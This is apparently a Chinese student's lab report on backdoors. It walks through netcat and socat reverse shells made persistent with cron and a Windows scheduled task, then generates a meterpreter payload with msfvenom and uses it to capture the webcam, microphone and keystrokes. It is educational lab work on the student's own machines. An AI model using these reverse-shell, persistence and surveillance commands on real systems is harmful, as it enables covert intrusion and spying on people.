网络对抗实验二 后门原理与实践
实验内容
1.使用netcat获取主机操作Shell,cron启动
(1)使用netcat获取主机操作shell
首先在Kali终端输入ifconfig查找IP地址,Kali端IP地址为192.168.0.186
然后在Windows下输入ipconfig查询windows的ip为192.168.0.128
接下来在Linux端运行监听指令nc -l -p 1206
Windows反弹连接Linux:
nc.exe -e cmd.exe 192.168.0.186 1206
然后在Linux下可以看到Windows的命令提示
(2)在虚拟机中启动cron并在主机监听
首先在虚拟机上用crontab -e
指令编辑一条定时任务,输入2表示选择vim编辑器
在最后一行添加10 * * * * nc 192.168.199.162 1206 -e /bin/sh
,即在每个小时的第10分钟反向连接Windows主机的1206端口
在每个小时的第10分钟,在主机输入nc.exe -l -p 1206
打开监听即可
2.使用socat获取主机操作Shell, 任务计划启动
在Windows中按Win+R,再输入compmgmt.msc
打开计算机管理,在系统工具中的任务计划程序中创建任务,命名为20201206
设置一个触发器,这里设置当锁定任何用户工作站时
新建操作,找到socat.exe文件,并添加参数tcp:192.168.0.186:1206 exec:cmd.exe,pty,stderr
设置好后我们按下Win+L将电脑锁屏,并在Kali中输入命令socat tcp-listen:1206 -
获取了主机操作Shell
3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
在Linux输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.186 LPORT=1206 -f exe > 20201206_backdoor.exe
生成后门可执行程序
在Windows输入nc.exe -l -p 1206 >C:\Users\18824\20201206_backdoor.exe
打开监听
在Linux端用nc 192.168.0.128 1206 < 20201206_backdoor.exe
将生成的20201206_backdoor.exe传到Windows端
在Linux上使用msfconsole
指令进入msf控制台
对msf控制台进行配置,依次输入以下命令:
use exploit/multi/handler #使用监听模块,设置payload
set LHOST 192.168.0.186 #KaliIP,和生成后门程序时指定的IP相同
set LPORT 1206
set payload windows/meterpreter/reverse_tcp #使用和生成后门程序时相同的payload
输入run
开始监听,在Windows端在打开20201206_backdoor.exe
后,在Linux端成功获取到Windows的shell
4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
(1)获取摄像头
先输入webcam_list
查看摄像头列表,再输入webcam_snap
指令控制摄像头进行拍照
(2)获取音频
输入record_mic
进行录音
(3)获取击键记录
输入keyscan_start
开始捕获键盘记录,keyscan_dump
获取击键记录
报告内容
基础问题回答
1.例举你能想到的一个后门进入到你系统中的可能方式?
拼多多购买廉价U盘,下载U盘里的文件,导致后门进入我的系统。
2.例举你知道的后门如何启动起来(win及linux)的方式?
开机启动,定时任务,伪装成无害软件让用户运行。
3.Meterpreter有哪些给你映像深刻的功能?
除了通过简单的几行代码就可以获取目标机的摄像头、录音器之外,还可以通过清除系统事件来做到不暴露攻击者的痕迹,做到来无影去无踪。
4.如何发现自己有系统有没有被安装后门?
一般的带后门的软件在下载到电脑时就已经被杀毒软件清除到隔离区,一些隐藏较深的则需要定期进行全盘查杀。
实验总结与体会
本次实验过程不算顺利,在过程中卡住了很久,但是当进行到第四项题目时,输入代码webcam_snap
后,看到突然出现在屏幕上的我的脸,让我觉得一切都是值得的,这次实验也让我意识到了防火墙、杀毒软件的必要性和重要性。但在实验成功的喜悦和新鲜感过去之后,我脑海里不禁浮现出一个问题:我真的还有隐私吗?